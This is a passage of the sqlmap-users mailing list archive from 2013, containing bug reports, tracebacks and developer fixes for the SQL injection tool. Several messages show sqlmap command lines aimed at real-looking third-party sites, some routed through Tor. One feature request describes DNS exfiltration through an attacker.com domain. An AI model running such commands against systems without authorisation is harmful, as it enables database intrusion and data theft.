>     >         >     >     <abunchofpostparams>
>     >         >     >
>     >         >     >
>     >         >     >     No hints that cookie-file is not in correct format (I've been through this,
>     >         >     >     at least I think I so ;) ).
>     >         >     >
>     >         >     >     Any insight would be much appreciated.
>     >         >     >
>     >         >     >
>     >         >     >     Cheers,
>     >         >     >
>     >         >     >     Dirk
>     >         >     >
>     >         >     >
>     >         >     >     ------------------------------------------------------------------------------
>     >         >     >     Precog is a next-generation analytics platform capable of advanced
>     >         >     >     analytics on semi-structured data. The platform includes APIs for building
>     >         >     >     apps and a phenomenal toolset for data science. Developers can use
>     >         >     >     our toolset for easy data analysis & visualization. Get a free account!
>     >         >     >     http://www2.precog.com/precogplatform/slashdotnewsletter
>     >         >     >     _______________________________________________
>     >         >     >     sqlmap-users mailing list
>     >         >     >     sql...@li... <mailto:sql...@li...> <mailto:sql...@li... <mailto:sql...@li...>> <mailto:sql...@li... <mailto:sql...@li...> <mailto:sql...@li... <mailto:sql...@li...>>> <mailto:sql...@li... <mailto:sql...@li...> <mailto:sql...@li... <mailto:sql...@li...>> <mailto:sql...@li... <mailto:sql...@li...> <mailto:sql...@li... <mailto:sql...@li...>>>>
>     >         >     >     https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>     >         >     >
>     >         >     >
>     >         >     >
>     >         >     >
>     >         >     > --
>     >         >     > Miroslav Stampar
>     >         >     > http://about.me/stamparm
>     >         >
>     >         >
>     >         >
>     >         >
>     >         > --
>     >         > Miroslav Stampar
>     >         > http://about.me/stamparm
>     >
>     >
>     >
>     >
>     >     --
>     >     Miroslav Stampar
>     >     http://about.me/stamparm
>     >
>     >
>     >
>     >
>     > --
>     > Miroslav Stampar
>     > http://about.me/stamparm
>
>
>
>
> -- 
> Miroslav Stampar
> http://about.me/stamparm




------------------------------

Message: 6
Date: Mon, 15 Apr 2013 14:01:01 -0700
From: <co...@5i...>
Subject: [sqlmap-users] --host parameter
To: sql...@li...
Message-ID:
	<201...@em...>
	
Content-Type: text/plain; charset="utf-8"

Hello,
the --host doesn't work as expected, or I am doing something wrong:


this works as expected:

./sqlmap.py --url='http://i.csland.ro/index.php?id=0'

    sqlmap/1.0-dev-840ee26 - automatic SQL injection and database
takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without
prior mutual consent is illegal. It is the end user's responsibility to
obey all applicable local, state and federal laws. Developers assume no
liability and are not responsible for any misuse or damage caused by
this program

[*] starting at 23:57:15

[23:57:15] [INFO] testing connection to the target URL
[23:57:15] [INFO] heuristics detected web page charset 'ascii'
[23:57:15] [INFO] testing if the target URL is stable. This can take a
couple of seconds
[23:57:16] [INFO] target URL is stable
[23:57:16] [INFO] testing if GET parameter 'id' is dynamic
[23:57:16] [INFO] confirming that GET parameter 'id' is dynamic
[23:57:16] [INFO] GET parameter 'id' is dynamic
[23:57:16] [INFO] heuristic (basic) test shows that GET parameter 'id'
might be injectable (possible DBMS: 'MySQL')
[23:57:16] [INFO] testing for SQL injection on GET parameter 'id'


....


this doesn't work as expected:

 ./sqlmap.py --host='i.csland.ro'
--url='http://188.240.236.15/index.php?id=0'

    sqlmap/1.0-dev-840ee26 - automatic SQL injection and database
takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without
prior mutual consent is illegal. It is the end user's responsibility to
obey all applicable local, state and federal laws. Developers assume no
liability and are not responsible for any misuse or damage caused by
this program

[*] starting at 23:58:03

[23:58:03] [INFO] testing connection to the target URL
[23:58:03] [CRITICAL] page not found (404)
it is not recommended to continue in this kind of cases. Do you want to
quit and make sure that everything is set up properly? [Y/n]
[23:58:05] [WARNING] HTTP error codes detected during run:

............


Of course i.csland.ro resolves to 188.240.236.15. Any idea?

Thanks.




------------------------------

Message: 7
Date: Tue, 16 Apr 2013 09:12:05 +1100
From: ???????? ?????? <vo...@s2...>
Subject: [sqlmap-users] Sqlmap and direct connect error
To: sql...@li...
Message-ID: <C59...@s2...>
Content-Type: text/plain; charset=us-ascii

Hi!

This bug detected if add direct param.

python sqlmap.py -d "mysql://yakimov:pass@127.0.0.1:3306/tech" -u "http://s25.ru/index.phtml?center=7&id=186" --random-agent --tor --tor-type=SOCKS5 --tor-port=49832 --dbms=MySQL --os=Linux  --tables --exclude-sysdbs


[01:48:28] [CRITICAL] unhandled exception in sqlmap/1.0-dev-de99717, retry your run with the latest development version from the GitHub repository. If the exception persists, please send by e-mail to 'sql...@li...' or open a new issue at 'https://github.com/sqlmapproject/sqlmap/issues/new' with the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you.
sqlmap version: 1.0-dev-de99717
Python version: 2.7.3
Operating system: posix
Command line: sqlmap.py -d **************************************************** -u http://s25.ru/index.phtml?center=7&id=186 --random-agent --tor --tor-type=SOCKS5 --tor-port=49832 --dbms=MySQL --os=Linux --tables --exclude-sysdbs
Technique: None
Back-end DBMS: MySQL (identified)
Traceback (most recent call last):
  File "sqlmap.py", line 87, in main
    start()
  File "/home/yakimov/sqlmap/lib/controller/controller.py", line 248, in start
    action()
  File "/home/yakimov/sqlmap/lib/controller/action.py", line 32, in action
    setHandler()
  File "/home/yakimov/sqlmap/lib/controller/handler.py", line 95, in setHandler
    conf.dbmsConnector.connect()
  File "/home/yakimov/sqlmap/plugins/dbms/mysql/connector.py", line 38, in connect
    self.connector = pymysql.connect(host=self.hostname, user=self.user, passwd=self.password, db=self.db, port=self.port, connect_timeout=conf.timeout, use_unicode=True)
  File "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/__init__.py", line 93, in Connect
    return Connection(*args, **kwargs)
  File "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/connections.py", line 584, in __init__
    self._connect()
  File "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/connections.py", line 739, in _connect
    sock.connect((self.host, self.port))
  File "/home/yakimov/sqlmap/thirdparty/socks/socks.py", line 365, in connect
    raise GeneralProxyError((5, _generalerrors[5]))
GeneralProxyError: (5, 'bad input')




------------------------------

Message: 8
Date: Tue, 16 Apr 2013 14:19:18 +0200
From: Miroslav Stampar <mir...@gm...>
Subject: Re: [sqlmap-users] --host parameter
To: co...@5i...
Cc: SqlMap List <sql...@li...>
Message-ID:
	<CA+...@ma...>
Content-Type: text/plain; charset="iso-8859-1"

Hi.

Thank you for your report and find it fixed with the latest commit [1].

Kind regards,
Miroslav Stampar

[1]
https://github.com/sqlmapproject/sqlmap/commit/6fed1921edf1baaf23a54fbe340ff3781fc05c86


On Mon, Apr 15, 2013 at 11:01 PM, <co...@5i...> wrote:

> Hello,
> the --host doesn't work as expected, or I am doing something wrong:
>
>
> this works as expected:
>
> ./sqlmap.py --url='http://i.csland.ro/index.php?id=0'
>
>     sqlmap/1.0-dev-840ee26 - automatic SQL injection and database
> takeover tool
>     http://sqlmap.org
>
> [!] legal disclaimer: Usage of sqlmap for attacking targets without
> prior mutual consent is illegal. It is the end user's responsibility to
> obey all applicable local, state and federal laws. Developers assume no
> liability and are not responsible for any misuse or damage caused by
> this program
>
> [*] starting at 23:57:15
>
> [23:57:15] [INFO] testing connection to the target URL
> [23:57:15] [INFO] heuristics detected web page charset 'ascii'
> [23:57:15] [INFO] testing if the target URL is stable. This can take a
> couple of seconds
> [23:57:16] [INFO] target URL is stable
> [23:57:16] [INFO] testing if GET parameter 'id' is dynamic
> [23:57:16] [INFO] confirming that GET parameter 'id' is dynamic
> [23:57:16] [INFO] GET parameter 'id' is dynamic
> [23:57:16] [INFO] heuristic (basic) test shows that GET parameter 'id'
> might be injectable (possible DBMS: 'MySQL')
> [23:57:16] [INFO] testing for SQL injection on GET parameter 'id'
>
>
> ....
>
>
> this doesn't work as expected:
>
>  ./sqlmap.py --host='i.csland.ro'
> --url='http://188.240.236.15/index.php?id=0'
>
>     sqlmap/1.0-dev-840ee26 - automatic SQL injection and database
> takeover tool
>     http://sqlmap.org
>
> [!] legal disclaimer: Usage of sqlmap for attacking targets without
> prior mutual consent is illegal. It is the end user's responsibility to
> obey all applicable local, state and federal laws. Developers assume no
> liability and are not responsible for any misuse or damage caused by
> this program
>
> [*] starting at 23:58:03
>
> [23:58:03] [INFO] testing connection to the target URL
> [23:58:03] [CRITICAL] page not found (404)
> it is not recommended to continue in this kind of cases. Do you want to
> quit and make sure that everything is set up properly? [Y/n]
> [23:58:05] [WARNING] HTTP error codes detected during run:
>
> ............
>
>
> Of course i.csland.ro resolves to 188.240.236.15. Any idea?
>
> Thanks.
>
>
>
> ------------------------------------------------------------------------------
> Precog is a next-generation analytics platform capable of advanced
> analytics on semi-structured data. The platform includes APIs for building
> apps and a phenomenal toolset for data science. Developers can use
> our toolset for easy data analysis & visualization. Get a free account!
> http://www2.precog.com/precogplatform/slashdotnewsletter
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>



-- 
Miroslav Stampar
http://about.me/stamparm
-------------- next part --------------
An HTML attachment was scrubbed...

------------------------------

Message: 9
Date: Tue, 16 Apr 2013 14:33:33 +0200
From: Miroslav Stampar <mir...@gm...>
Subject: Re: [sqlmap-users] Sqlmap and direct connect error
To: ???????? ?????? <vo...@s2...>
Cc: SqlMap List <sql...@li...>
Message-ID:
	<CA+9yoX0rxH+=vZuYiArFNZhK1xhwos=SNhMqEmFmnCafw-ot=g...@ma...>
Content-Type: text/plain; charset="koi8-r"

Hi Vladimir.

Find it "patched" with the latest commit [1]. Basically, those combinations
should not be allowed (-d and --url; -d and --tor; etc.) and now we've
added new option validation checks for this kind of cases.

Kind regards,
Miroslav Stampar

[1]
https://github.com/sqlmapproject/sqlmap/commit/c73489aff3861f1cac7de41494a296c1095e141a


On Tue, Apr 16, 2013 at 12:12 AM, ???????? ?????? <vo...@s2...> wrote:

> Hi!
>
> This bug detected if add direct param.
>
> python sqlmap.py -d "mysql://yakimov:pass@127.0.0.1:3306/tech" -u "
> http://s25.ru/index.phtml?center=7&id=186" --random-agent --tor
> --tor-type=SOCKS5 --tor-port=49832 --dbms=MySQL --os=Linux  --tables
> --exclude-sysdbs
>
>
> [01:48:28] [CRITICAL] unhandled exception in sqlmap/1.0-dev-de99717, retry
> your run with the latest development version from the GitHub repository. If
> the exception persists, please send by e-mail to '
> sql...@li...' or open a new issue at '
> https://github.com/sqlmapproject/sqlmap/issues/new' with the following
> text and any information required to reproduce the bug. The developers will
> try to reproduce the bug, fix it accordingly and get back to you.
> sqlmap version: 1.0-dev-de99717
> Python version: 2.7.3
> Operating system: posix
> Command line: sqlmap.py -d
> **************************************************** -u
> http://s25.ru/index.phtml?center=7&id=186 --random-agent --tor
> --tor-type=SOCKS5 --tor-port=49832 --dbms=MySQL --os=Linux --tables
> --exclude-sysdbs
> Technique: None
> Back-end DBMS: MySQL (identified)
> Traceback (most recent call last):
>   File "sqlmap.py", line 87, in main
>     start()
>   File "/home/yakimov/sqlmap/lib/controller/controller.py", line 248, in
> start
>     action()
>   File "/home/yakimov/sqlmap/lib/controller/action.py", line 32, in action
>     setHandler()
>   File "/home/yakimov/sqlmap/lib/controller/handler.py", line 95, in
> setHandler
>     conf.dbmsConnector.connect()
>   File "/home/yakimov/sqlmap/plugins/dbms/mysql/connector.py", line 38, in
> connect
>     self.connector = pymysql.connect(host=self.hostname, user=self.user,
> passwd=self.password, db=self.db, port=self.port,
> connect_timeout=conf.timeout, use_unicode=True)
>   File
> "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/__init__.py",
> line 93, in Connect
>     return Connection(*args, **kwargs)
>   File
> "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/connections.py",
> line 584, in __init__
>     self._connect()
>   File
> "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/connections.py",
> line 739, in _connect
>     sock.connect((self.host, self.port))
>   File "/home/yakimov/sqlmap/thirdparty/socks/socks.py", line 365, in
> connect
>     raise GeneralProxyError((5, _generalerrors[5]))
> GeneralProxyError: (5, 'bad input')
>
>
>
> ------------------------------------------------------------------------------
> Precog is a next-generation analytics platform capable of advanced
> analytics on semi-structured data. The platform includes APIs for building
> apps and a phenomenal toolset for data science. Developers can use
> our toolset for easy data analysis & visualization. Get a free account!
> http://www2.precog.com/precogplatform/slashdotnewsletter
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>



-- 
Miroslav Stampar
http://about.me/stamparm
-------------- next part --------------
An HTML attachment was scrubbed...

------------------------------

Message: 10
Date: Tue, 16 Apr 2013 23:26:39 +0200
From: buawig <bu...@gm...>
Subject: [sqlmap-users] feature request: offline mode for
	--dns-domain?
To: SqlMap List <sql...@li...>
Message-ID: <516...@gm...>
Content-Type: text/plain; charset=UTF-8

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Hi,

in cases where sqlmap is run against targets on internal networks it
would be great if one could tell sqlmap to simply proceed without
expecting incoming DNS requests, because sqlmap can not be executed
directly on the DNS server (which can't reach the target, but the
target can reach the DNS server).

For me it would be enough to simply run something like
- -u ... --dns-domain=attacker.com --dns-port=0
(--dns-port does not exist [yet])

to let sqlmap know that it doesn't need to start a DNS listener.

I would then collect and decode the DNS querries on the DNS server
manually, but I could also envision running a second sqlmap instance
on the DNS server with --dns-domain (but without -u) doing that job.

-----BEGIN PGP SIGNATURE-----

iQIcBAEBCgAGBQJRbcIPAAoJEJeRHQyF0ukM/VwQAKlZKRyuk55ZbiOzbRPztw/p
dGHg7KLwPJ5fM9uXDNodO7cdZF18x6EJOjTJwu6sRNvUwjiAWb7VwAB6HLcts8Qf
WXQL5OUBEzJiYJ/XUVZonPvw+PGc781rNTJDnbW3RKSQK8Hd7T5TgfDE0ucqTCRz
cJ1NbcDswrCQNZtKr09SRW9kxk1QfHsbAGfQYpQh0LrIR3cTageFPLJ+hosMF+VU
uoEiu6k9JJwbWlKCMu2uz/UrLRqdt7VtjhkpbLSLMBL/IOnfTHfdQ37NRYcJIkos
D/sZIyA0MT/woN25rVVDAhxwVZ2MFcxn7eMKXZCxv5VpXZKQxeMtew8maDBwom5C
JdM+bF6AoE56zqi/+qaYajPmO0GYQXy26YUhbRJUufF2ThSTTWnmgZ8QH6fKUbfN
QTGbXyH/FbaXDMDokEButCcrD1PCpvklfz44VU7zi0zG/wBN+mnleT24bvW1tbhx
J1vCEbXWEFCfxwCqTDopLHaGNkIlo4oH4PUsIyW1FlTYQRqH5cUe2bV1F0XcP3/O
yNyHZmLMGtPdEvJ+Wkx8Bp4gcUC2ikKlS6H85TMDu6GxS5oi7EK+kGnJ+njhPeaF
plSWWJFQHEm0DJ/ZCGjgzZyvS8QzK7WDfplpR/TBrc3uOLXZVqDhPW4IkLLc49Vz
N5xHRCVPLLSrPfTPiyIJ
=JSkD
-----END PGP SIGNATURE-----



------------------------------

Message: 11
Date: Tue, 16 Apr 2013 23:24:23 +0200
From: buawig <bu...@gm...>
Subject: [sqlmap-users] feature request: --dns-domain for non-root
	users	(--dns-port)
To: sql...@li...
Message-ID: <516...@gm...>
Content-Type: text/plain; charset=UTF-8

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Hi,

I just wanted to request a "extension" for a previous feature request
(DNS exfiltration [1]) but after looking at my former feature request
I realized that it included already the feature I was about to request:

- --dns-domain for non-root users:
- --dns-port

The use-case is mentioned in the former feature request:

[1] http://sourceforge.net/mailarchive/message.php?msg_id=27108100
-----BEGIN PGP SIGNATURE-----

iQIcBAEBCgAGBQJRbcGHAAoJEJeRHQyF0ukM58gP/1o1qTQTI9bzk3Ez+2wcqign
F0BlB//+rB6CzBPsEvkRioefbJPIcbX9Kcq+IqDygtk8/ux9uR3s1nKyps6nmvY6
EXi4EY0e8uMPc2oXGkMVie1UOYvKiW7apnEEOoIgymLpx/UiXh...
 
[truncated message content]

Re: [sqlmap-users] Providing multiple dbms

[Miroslav S. <mir...@gm...>]

p.s. correction of mistype: "payloads specific for those payloads" ->
"payloads specific for those DBMSes"


On Wed, May 29, 2013 at 5:46 PM, Miroslav Stampar <
mir...@gm...> wrote:

> Hi.
>
> Problem with this approach is that only payloads specific for those
> payloads will be used, skipping all generic ones.
>
> To further address the issue suggested option is:
> --test-filter "MySQL|PostgreSQL|Oracle|Generic"
>
> Nevertheless, in vast majority of cases, default sqlmap run and/or
> --level=5 --risk=3 is more recommended (at least in your case) than
> --test-filter.
>
> Kind regards,
> Miroslav Stampar
>
>
> On Wed, May 29, 2013 at 5:40 PM, Bernardo Damele A. G. <
> ber...@gm...> wrote:
>
>> Sebastian,
>>
>> Launch with --test-filter "MySQL|PostgreSQL|Oracle". sqlmap will only
>> try related payloads.
>>
>> Bernardo
>>
>>
>> On 29 May 2013 16:29, Miroslav Stampar <mir...@gm...>
>> wrote:
>> > Hi Sebastian.
>> >
>> > No, it's not possible. The question is why do you want to provide any
>> DBMS
>> > in that case? Why don't you just skip the option --dbms and don't use
>> it.
>> > sqlmap will then do tests against all possible DBMSes the best it can.
>> >
>> > Kind regards,
>> > Miroslav Stampar
>> >
>> >
>> > On Wed, May 29, 2013 at 5:22 PM, Sebastian Nerz <seb...@sy...
>> >
>> > wrote:
>> >>
>> >> Hi,
>> >>
>> >> is it possible to provide multiple dbms? In some cases, one does know
>> >> that it might be e.g. MySQL or PostgreSQL or Oracle.
>> >>
>> >> all the best,
>> >>
>> >> Sebastian Nerz
>> >> --
>> >> Sebastian Nerz
>> >> Dipl.-Inform.
>> >> IT-Security Consultant
>> >>
>> >> mailto:seb...@sy...
>> >> ___________________________________________________________
>> >>
>> >> SySS GmbH
>> >> Wohlboldstraße 8
>> >> 72072 Tübingen
>> >> Germany
>> >> Voice: +49 7071 407856-31
>> >> Fax:   +49 7071 407856-19
>> >> WWW:   http://www.syss.de
>> >>
>> >> PGP FP: 79DC 2CEC D18D F92F CBB4 AF09 D12D 26A4 9180 FDB2
>> >>
>> >> Geschaeftsfuehrer Sebastian Schreiber
>> >> Registergericht: Amtsgericht Stuttgart / HRB 382420
>> >> Steuernummer: 86118 / 55809
>> >>
>> >>
>> >>
>> >>
>> >>
>> ------------------------------------------------------------------------------
>> >> Introducing AppDynamics Lite, a free troubleshooting tool for Java/.NET
>> >> Get 100% visibility into your production application - at no cost.
>> >> Code-level diagnostics for performance bottlenecks with <2% overhead
>> >> Download for free and get started troubleshooting in minutes.
>> >> http://p.sf.net/sfu/appdyn_d2d_ap1
>> >> _______________________________________________
>> >> sqlmap-users mailing list
>> >> sql...@li...
>> >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>> >>
>> >
>> >
>> >
>> > --
>> > Miroslav Stampar
>> > http://about.me/stamparm
>> >
>> >
>> ------------------------------------------------------------------------------
>> > Introducing AppDynamics Lite, a free troubleshooting tool for Java/.NET
>> > Get 100% visibility into your production application - at no cost.
>> > Code-level diagnostics for performance bottlenecks with <2% overhead
>> > Download for free and get started troubleshooting in minutes.
>> > http://p.sf.net/sfu/appdyn_d2d_ap1
>> > _______________________________________________
>> > sqlmap-users mailing list
>> > sql...@li...
>> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>> >
>>
>>
>>
>> --
>> Bernardo Damele A. G.
>>
>> E-mail / Jabber: bernardo.damele (at) gmail.com
>> Mobile: +447788962949 (UK 07788962949)
>>
>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
>



-- 
Miroslav Stampar
http://about.me/stamparm

Re: [sqlmap-users] Providing multiple dbms

[Miroslav S. <mir...@gm...>]

Hi.

Problem with this approach is that only payloads specific for those
payloads will be used, skipping all generic ones.

To further address the issue suggested option is:
--test-filter "MySQL|PostgreSQL|Oracle|Generic"

Nevertheless, in vast majority of cases, default sqlmap run and/or
--level=5 --risk=3 is more recommended (at least in your case) than
--test-filter.

Kind regards,
Miroslav Stampar


On Wed, May 29, 2013 at 5:40 PM, Bernardo Damele A. G. <
ber...@gm...> wrote:

> Sebastian,
>
> Launch with --test-filter "MySQL|PostgreSQL|Oracle". sqlmap will only
> try related payloads.
>
> Bernardo
>
>
> On 29 May 2013 16:29, Miroslav Stampar <mir...@gm...> wrote:
> > Hi Sebastian.
> >
> > No, it's not possible. The question is why do you want to provide any
> DBMS
> > in that case? Why don't you just skip the option --dbms and don't use it.
> > sqlmap will then do tests against all possible DBMSes the best it can.
> >
> > Kind regards,
> > Miroslav Stampar
> >
> >
> > On Wed, May 29, 2013 at 5:22 PM, Sebastian Nerz <seb...@sy...>
> > wrote:
> >>
> >> Hi,
> >>
> >> is it possible to provide multiple dbms? In some cases, one does know
> >> that it might be e.g. MySQL or PostgreSQL or Oracle.
> >>
> >> all the best,
> >>
> >> Sebastian Nerz
> >> --
> >> Sebastian Nerz
> >> Dipl.-Inform.
> >> IT-Security Consultant
> >>
> >> mailto:seb...@sy...
> >> ___________________________________________________________
> >>
> >> SySS GmbH
> >> Wohlboldstraße 8
> >> 72072 Tübingen
> >> Germany
> >> Voice: +49 7071 407856-31
> >> Fax:   +49 7071 407856-19
> >> WWW:   http://www.syss.de
> >>
> >> PGP FP: 79DC 2CEC D18D F92F CBB4 AF09 D12D 26A4 9180 FDB2
> >>
> >> Geschaeftsfuehrer Sebastian Schreiber
> >> Registergericht: Amtsgericht Stuttgart / HRB 382420
> >> Steuernummer: 86118 / 55809
> >>
> >>
> >>
> >>
> >>
> ------------------------------------------------------------------------------
> >> Introducing AppDynamics Lite, a free troubleshooting tool for Java/.NET
> >> Get 100% visibility into your production application - at no cost.
> >> Code-level diagnostics for performance bottlenecks with <2% overhead
> >> Download for free and get started troubleshooting in minutes.
> >> http://p.sf.net/sfu/appdyn_d2d_ap1
> >> _______________________________________________
> >> sqlmap-users mailing list
> >> sql...@li...
> >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
> >>
> >
> >
> >
> > --
> > Miroslav Stampar
> > http://about.me/stamparm
> >
> >
> ------------------------------------------------------------------------------
> > Introducing AppDynamics Lite, a free troubleshooting tool for Java/.NET
> > Get 100% visibility into your production application - at no cost.
> > Code-level diagnostics for performance bottlenecks with <2% overhead
> > Download for free and get started troubleshooting in minutes.
> > http://p.sf.net/sfu/appdyn_d2d_ap1
> > _______________________________________________
> > sqlmap-users mailing list
> > sql...@li...
> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
> >
>
>
>
> --
> Bernardo Damele A. G.
>
> E-mail / Jabber: bernardo.damele (at) gmail.com
> Mobile: +447788962949 (UK 07788962949)
>



-- 
Miroslav Stampar
http://about.me/stamparm

Re: [sqlmap-users] Providing multiple dbms

[Bernardo D. A. G. <ber...@gm...>]

Sebastian,

Launch with --test-filter "MySQL|PostgreSQL|Oracle". sqlmap will only
try related payloads.

Bernardo


On 29 May 2013 16:29, Miroslav Stampar <mir...@gm...> wrote:
> Hi Sebastian.
>
> No, it's not possible. The question is why do you want to provide any DBMS
> in that case? Why don't you just skip the option --dbms and don't use it.
> sqlmap will then do tests against all possible DBMSes the best it can.
>
> Kind regards,
> Miroslav Stampar
>
>
> On Wed, May 29, 2013 at 5:22 PM, Sebastian Nerz <seb...@sy...>
> wrote:
>>
>> Hi,
>>
>> is it possible to provide multiple dbms? In some cases, one does know
>> that it might be e.g. MySQL or PostgreSQL or Oracle.
>>
>> all the best,
>>
>> Sebastian Nerz
>> --
>> Sebastian Nerz
>> Dipl.-Inform.
>> IT-Security Consultant
>>
>> mailto:seb...@sy...
>> ___________________________________________________________
>>
>> SySS GmbH
>> Wohlboldstraße 8
>> 72072 Tübingen
>> Germany
>> Voice: +49 7071 407856-31
>> Fax:   +49 7071 407856-19
>> WWW:   http://www.syss.de
>>
>> PGP FP: 79DC 2CEC D18D F92F CBB4 AF09 D12D 26A4 9180 FDB2
>>
>> Geschaeftsfuehrer Sebastian Schreiber
>> Registergericht: Amtsgericht Stuttgart / HRB 382420
>> Steuernummer: 86118 / 55809
>>
>>
>>
>>
>> ------------------------------------------------------------------------------
>> Introducing AppDynamics Lite, a free troubleshooting tool for Java/.NET
>> Get 100% visibility into your production application - at no cost.
>> Code-level diagnostics for performance bottlenecks with <2% overhead
>> Download for free and get started troubleshooting in minutes.
>> http://p.sf.net/sfu/appdyn_d2d_ap1
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
>
> ------------------------------------------------------------------------------
> Introducing AppDynamics Lite, a free troubleshooting tool for Java/.NET
> Get 100% visibility into your production application - at no cost.
> Code-level diagnostics for performance bottlenecks with <2% overhead
> Download for free and get started troubleshooting in minutes.
> http://p.sf.net/sfu/appdyn_d2d_ap1
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>



-- 
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)

Re: [sqlmap-users] Providing multiple dbms

[Miroslav S. <mir...@gm...>]

Hi Sebastian.

No, it's not possible. The question is why do you want to provide any DBMS
in that case? Why don't you just skip the option --dbms and don't use it.
sqlmap will then do tests against all possible DBMSes the best it can.

Kind regards,
Miroslav Stampar


On Wed, May 29, 2013 at 5:22 PM, Sebastian Nerz <seb...@sy...>wrote:

> Hi,
>
> is it possible to provide multiple dbms? In some cases, one does know
> that it might be e.g. MySQL or PostgreSQL or Oracle.
>
> all the best,
>
> Sebastian Nerz
> --
> Sebastian Nerz
> Dipl.-Inform.
> IT-Security Consultant
>
> mailto:seb...@sy...
> ___________________________________________________________
>
> SySS GmbH
> Wohlboldstraße 8
> 72072 Tübingen
> Germany
> Voice: +49 7071 407856-31
> Fax:   +49 7071 407856-19
> WWW:   http://www.syss.de
>
> PGP FP: 79DC 2CEC D18D F92F CBB4 AF09 D12D 26A4 9180 FDB2
>
> Geschaeftsfuehrer Sebastian Schreiber
> Registergericht: Amtsgericht Stuttgart / HRB 382420
> Steuernummer: 86118 / 55809
>
>
>
>
> ------------------------------------------------------------------------------
> Introducing AppDynamics Lite, a free troubleshooting tool for Java/.NET
> Get 100% visibility into your production application - at no cost.
> Code-level diagnostics for performance bottlenecks with <2% overhead
> Download for free and get started troubleshooting in minutes.
> http://p.sf.net/sfu/appdyn_d2d_ap1
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>


-- 
Miroslav Stampar
http://about.me/stamparm

[sqlmap-users] Providing multiple dbms

[Sebastian N. <seb...@sy...>]

Hi,

is it possible to provide multiple dbms? In some cases, one does know
that it might be e.g. MySQL or PostgreSQL or Oracle.

all the best,

Sebastian Nerz
-- 
Sebastian Nerz
Dipl.-Inform.
IT-Security Consultant

mailto:seb...@sy...
___________________________________________________________

SySS GmbH
Wohlboldstraße 8
72072 Tübingen
Germany
Voice: +49 7071 407856-31
Fax:   +49 7071 407856-19
WWW:   http://www.syss.de

PGP FP: 79DC 2CEC D18D F92F CBB4 AF09 D12D 26A4 9180 FDB2

Geschaeftsfuehrer Sebastian Schreiber
Registergericht: Amtsgericht Stuttgart / HRB 382420
Steuernummer: 86118 / 55809

Re: [sqlmap-users] [CRITICAL]

[Miroslav S. <mir...@gm...>]

Hi.

Thank you for your report and find it "patched" now.

Kind regards,
Miroslav Stampar


On Wed, May 29, 2013 at 9:38 AM, Thai Thao <dt...@gm...> wrote:

> sqlmap version: 1.0-dev
> Python version: 2.7.2
> Operating system: nt
> Command line: C:\sqlmap\sqlmapproject-sqlmap-6b280d8\sqlmap.py
> Technique: None
> Back-end DBMS: None (identified)
>  [41m [37mTraceback (most recent call last):
>   File "C:\sqlmap\sqlmapproject-sqlmap-6b280d8\sqlmap.py", line 61, in main
>     paths.SQLMAP_ROOT_PATH = modulePath()
>   File "C:\sqlmap\sqlmapproject-sqlmap-6b280d8\sqlmap.py", line 53, in
> modulePath
>     return os.path.dirname(os.path.realpath(getUnicode(sys.executable if
> weAreFrozen() else __file__, sys.getfilesystemencoding())))
> NameError: global name '__file__' is not defined
> [0m
> [*] shutting down at 03:35:44
>
>
>
>
> I have windows 8 with amd A8 processor. (laptop)
>
>
> ------------------------------------------------------------------------------
> Introducing AppDynamics Lite, a free troubleshooting tool for Java/.NET
> Get 100% visibility into your production application - at no cost.
> Code-level diagnostics for performance bottlenecks with <2% overhead
> Download for free and get started troubleshooting in minutes.
> http://p.sf.net/sfu/appdyn_d2d_ap1
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>


-- 
Miroslav Stampar
http://about.me/stamparm

[sqlmap-users] [CRITICAL]

[Thai T. <dt...@gm...>]

sqlmap version: 1.0-dev
Python version: 2.7.2
Operating system: nt
Command line: C:\sqlmap\sqlmapproject-sqlmap-6b280d8\sqlmap.py
Technique: None
Back-end DBMS: None (identified)
Traceback (most recent call last):
  File "C:\sqlmap\sqlmapproject-sqlmap-6b280d8\sqlmap.py", line 61, in main
    paths.SQLMAP_ROOT_PATH = modulePath()
  File "C:\sqlmap\sqlmapproject-sqlmap-6b280d8\sqlmap.py", line 53, in
modulePath
    return os.path.dirname(os.path.realpath(getUnicode(sys.executable if
weAreFrozen() else __file__, sys.getfilesystemencoding())))
NameError: global name '__file__' is not defined

[*] shutting down at 03:35:44




I have windows 8 with amd A8 processor. (laptop)

Re: [sqlmap-users] SQLMAP Bug

[Miroslav S. <mir...@gm...>]

Hi Joe.

Thank you for your report and find it fixed now with the latest update.

Kind regards,
Miroslav Stampar


